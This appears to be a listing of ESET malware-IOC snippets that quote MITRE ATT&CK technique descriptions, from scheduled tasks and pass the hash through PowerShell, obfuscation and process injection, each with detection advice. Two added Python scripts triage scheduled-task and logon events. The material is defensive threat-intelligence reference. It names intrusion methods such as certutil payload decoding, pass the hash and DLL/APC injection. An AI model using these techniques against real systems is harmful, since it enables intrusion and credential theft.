other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring\n\nPermissions Required: User, Administrator", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically requires being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.\n\nDetection: Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the <code>svchost.exe<\/code> in Windows 10 and the Windows Task Scheduler <code>taskeng.exe<\/code> for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in <code>%systemroot%\\System32\\Tasks<\/code> for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler\/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)\n\n*Event ID 106 - Scheduled task registered\n*Event ID 140 - Scheduled task updated\n*Event ID 141 - Scheduled task removed\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring, Windows event logs\n\nEffective Permissions: Administrator, SYSTEM, User\n\nPermissions Required: Administrator, SYSTEM, User\n\nRemote Support: Yes\n\nContributors: Travis Smith, Tripwire, Leo Loobeek, @leoloobeek, Alain Homewood, Insomnia Security", © ESET 2014-2018
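The Scheduled Task entry above lists the three Microsoft-Windows-TaskScheduler/Operational event IDs worth collecting (106 registered, 140 updated, 141 removed) and two signals to look for: tasks that do not correlate with known software, and tasks an adversary removes as soon as the action has run. The following is an added example of that triage logic in Python; it is not code from the ESET malware-ioc repository or from MITRE. The event records are constructed samples whose field names mirror the channel's EventData (TaskName, UserContext), the task allowlist and the ten-minute "short-lived" threshold are site assumptions, and every host, user and task name is invented.

```python
"""Triage of Microsoft-Windows-TaskScheduler/Operational events.

Added example, not ESET or MITRE code.  Folds 106/140/141 events into one
lifecycle record per task and flags (a) task paths that do not correlate with
known software and (b) tasks registered and removed within a short window,
the one-shot execution pattern the ATT&CK text describes.  All sample data,
the allowlist and the threshold are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Assumption: task path prefixes that sanctioned software creates here.
KNOWN_TASK_PREFIXES = (
    "\\Microsoft\\Windows\\",
    "\\Adobe Acrobat Update Task",
)

# Assumption: a task removed this soon after registration is one-shot
# execution (lateral movement or a single payload run), not persistence.
SHORT_LIVED = timedelta(minutes=10)

# Constructed sample events from the TaskScheduler/Operational channel.
SAMPLE_EVENTS = [
    {"TimeCreated": "2020-05-01T09:00:00", "EventID": 106,
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "UserContext": "SYSTEM"},
    {"TimeCreated": "2020-05-01T13:41:10", "EventID": 106,
     "TaskName": "\\update", "UserContext": "CORP\\jdoe"},
    {"TimeCreated": "2020-05-01T13:41:12", "EventID": 140,
     "TaskName": "\\update", "UserContext": "CORP\\jdoe"},
    {"TimeCreated": "2020-05-01T13:43:07", "EventID": 141,
     "TaskName": "\\update", "UserContext": "CORP\\jdoe"},
    {"TimeCreated": "2020-05-01T14:02:00", "EventID": 106,
     "TaskName": "\\OfficeUpdater", "UserContext": "CORP\\jdoe"},
]


@dataclass
class TaskRecord:
    """Lifecycle of one task, folded from its 106/140/141 events."""
    name: str
    registered_by: str
    registered_at: datetime
    updates: int = 0
    removed_at: Optional[datetime] = None


def build_timeline(events: List[dict]) -> Dict[str, TaskRecord]:
    """Fold registration, update and removal events into one record per task.

    A 140 or 141 for a task with no 106 in the window is ignored: its
    registration predates the data we have, so no lifetime can be computed.
    """
    tasks: Dict[str, TaskRecord] = {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        name = ev["TaskName"]
        if ev["EventID"] == 106:
            tasks[name] = TaskRecord(name, ev["UserContext"], ts)
        elif ev["EventID"] == 140 and name in tasks:
            tasks[name].updates += 1
        elif ev["EventID"] == 141 and name in tasks:
            tasks[name].removed_at = ts
    return tasks


def is_known_task(name: str) -> bool:
    """True when the task path matches software we expect to create tasks."""
    return any(name.startswith(prefix) for prefix in KNOWN_TASK_PREFIXES)


def triage(events: List[dict]) -> Dict[str, List[str]]:
    """Return {task name: [reasons]} for every task an analyst should review."""
    findings: Dict[str, List[str]] = {}
    for name, rec in build_timeline(events).items():
        reasons = []
        if not is_known_task(name):
            reasons.append("task path does not correlate with known software")
        if rec.removed_at is not None and rec.removed_at - rec.registered_at < SHORT_LIVED:
            reasons.append("registered and removed within %s (one-shot execution)"
                           % (rec.removed_at - rec.registered_at))
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for task, why in triage(SAMPLE_EVENTS).items():
        print(task, "->", "; ".join(why))
```

The prefix allowlist is deliberately weak: a task registered under \Microsoft\Windows\ with a masqueraded name passes it, which is why the entry also recommends baselining task stores and Autoruns output rather than relying on names alone.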
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.\n\n===Windows===\n\nExample commands and utilities that obtain this information include <code>ver<\/code>, Systeminfo, and <code>dir<\/code> within cmd for identifying information based on present files and directories.\n\n===Mac===\n\nOn Mac, the <code>systemsetup<\/code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the <code>system_profiler<\/code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User", © ESET 2014-2018
malware-ioc misp-powerpool.json "description": "Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.[[Citation: Technet MS14-068]][[Citation: ADSecurity Detecting Forged Tickets]]\n\nDetection: Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X\n\nData Sources: Windows Error Reporting, File monitoring, Process monitoring\n\nEffective Permissions: User, Administrator, SYSTEM\n\nContributors: John Lambert, Microsoft Threat Intelligence Center", © ESET 2014-2018
malware-ioc misp-powerpool.json "description": "Pass the hash (PtH)[[Citation: Aorato PTH]] is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a [[Credential Access]] technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[[Citation: NSA Spotting]]\n\nDetection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Authentication logs", © ESET 2014-2018
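The Pass the Hash entry above gives a concrete detection rule: NTLM LogonType 3 authentications that are not domain logons and are not anonymous logons are suspicious, and on Windows 7 and later with KB2871997 the RID 500 administrator remains the local account that PtH still works against. The following is an added Python example of that rule applied to Security 4624 logon events; it is not code from the ESET malware-ioc repository or from MITRE. The records are constructed samples using 4624 EventData field names (LogonType, AuthenticationPackageName, TargetUserName, TargetDomainName, TargetUserSid, IpAddress, WorkstationName); the domain name, hosts, users and SIDs are invented.

```python
"""Pass-the-hash triage over Windows Security 4624 (logon) events.

Added example, not ESET or MITRE code.  Flags NTLM network logons that are
neither domain nor anonymous logons, marks RID 500 (built-in Administrator)
targets, and counts distinct hosts per source so one source spraying a local
admin hash across several machines stands out.  Sample data is constructed.
"""
from typing import Dict, List

DOMAIN = "CORP"  # assumption: the organisation's NetBIOS domain name

SAMPLE_LOGONS = [
    # Kerberos domain logon to a file server: expected.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "jdoe", "TargetDomainName": "CORP",
     "TargetUserSid": "S-1-5-21-1004336348-1177238915-682003330-1105",
     "IpAddress": "10.0.1.20", "WorkstationName": "FS01"},
    # NTLM network logon with a local account, not the domain: PtH candidate.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "TargetDomainName": "WS07",
     "TargetUserSid": "S-1-5-21-2647520361-1159033713-3581344895-500",
     "IpAddress": "10.0.1.55", "WorkstationName": "WS07"},
    # Same source, second host: the lateral-movement pattern.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "TargetDomainName": "WS12",
     "TargetUserSid": "S-1-5-21-3897564122-1287693011-2247361095-500",
     "IpAddress": "10.0.1.55", "WorkstationName": "WS12"},
    # Anonymous logon (null session): excluded by the rule.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "ANONYMOUS LOGON", "TargetDomainName": "NT AUTHORITY",
     "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.1.80", "WorkstationName": "FS01"},
    # NTLM for a domain account (e.g. a share opened by IP): not flagged here.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "svc_backup", "TargetDomainName": "CORP",
     "TargetUserSid": "S-1-5-21-1004336348-1177238915-682003330-1200",
     "IpAddress": "10.0.1.90", "WorkstationName": "FS01"},
    # Interactive console logon: wrong LogonType for this rule.
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "localuser", "TargetDomainName": "WS07",
     "TargetUserSid": "S-1-5-21-2647520361-1159033713-3581344895-1001",
     "IpAddress": "-", "WorkstationName": "WS07"},
]


def is_pth_candidate(ev: dict) -> bool:
    """The entry's rule: NTLM, network logon, not a domain logon, not anonymous."""
    if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
        return False
    if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
        return False
    if ev.get("TargetUserName", "").upper() == "ANONYMOUS LOGON":
        return False
    if ev.get("TargetDomainName", "").upper() == DOMAIN.upper():
        return False
    return True


def triage(events: List[dict]) -> List[dict]:
    """Return one finding per candidate logon, with a RID 500 marker.

    The RID is the last sub-authority of the SID; -500 is the built-in
    Administrator, the local account KB2871997 leaves usable for PtH.
    """
    findings = []
    for ev in events:
        if not is_pth_candidate(ev):
            continue
        findings.append({
            "user": ev["TargetUserName"],
            "target": ev["WorkstationName"],
            "source": ev["IpAddress"],
            "rid500": ev.get("TargetUserSid", "").endswith("-500"),
        })
    return findings


def hosts_per_source(findings: List[dict]) -> Dict[str, int]:
    """Distinct target hosts per source address: one source reaching several
    hosts with a local account is the signal worth escalating."""
    hosts: Dict[str, set] = {}
    for f in findings:
        hosts.setdefault(f["source"], set()).add(f["target"])
    return {src: len(h) for src, h in hosts.items()}


if __name__ == "__main__":
    hits = triage(SAMPLE_LOGONS)
    for h in hits:
        print(h)
    print(hosts_per_source(hits))
```

Domain accounts authenticating with NTLM are excluded only because the entry's rule is scoped to non-domain logons; in practice those are worth a second, lower-priority rule, since PtH works with domain hashes too when the account has rights on the target.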
malware-ioc misp-powerpool.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[[Citation: TechNet PowerShell]] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire,[[Citation: Github PowerShell Empire]] PowerSploit,[[Citation: Powersploit]] and PSAttack.[[Citation: Github PSAttack]]\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution.[[Citation: Malware Archaeology PowerShell Cheat Sheet]] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[[Citation: FireEye PowerShell Logging 2016]] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters", © ESET 2014-2018
malware-ioc misp-powerpool.json "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n===Mac===\n\nOn OSX, the native command <code>screencapture<\/code> is used to capture screenshots.\n\n===Linux===\n\nOn Linux, there is the native command <code>xwd<\/code>.[[Citation: Antiquated Mac Malware]]\n\nDetection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X\n\nData Sources: API monitoring, Process monitoring, File monitoring", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator\n\nRemote Support: Yes", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nAdversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)\n\nDetection: Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Authentication logs, Process monitoring\n\nEffective Permissions: User, Administrator\n\nDefense Bypassed: Anti-virus, Firewall, Host intrusion prevention systems, Network intrusion detection system, Process whitelisting, System access controls\n\nPermissions Required: User, Administrator", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.\n\nDetection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as Data Staged. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Data loss prevention\n\nPermissions Required: User\n\nSystem Requirements: Permissions to access directories and files that store information of interest.", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access certain files and directories", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Adversaries may target user email to collect sensitive information from a target.\n\nFiles containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.\n\nAdversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.\n\nSome adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.\n\nDetection: There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Authentication logs, File monitoring, Process monitoring, Process use of network", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring\n\nRequires Network: Yes", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator\n\nRemote Support: Yes", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting, PowerShell, or by using utilities present on the system.\n\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as Javascript.\n\nDetection: Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as certutil.\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters\n\nDefense Bypassed: Anti-virus, Host intrusion prevention systems, Signature-based detection, Network intrusion detection system\n\nPermissions Required: User\n\nContributors: Matthew Demaske, Adaptforward, Red Canary", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n===Windows===\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)\n* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.\n* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alertable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n===Mac and Linux===\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n*'''Ptrace system calls''' can be used to attach to a running process and modify it at runtime. (Citation: Uninformed Needle)\n*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.\n\nDetection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)\n\nMonitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)\n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)\n\nMonitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this 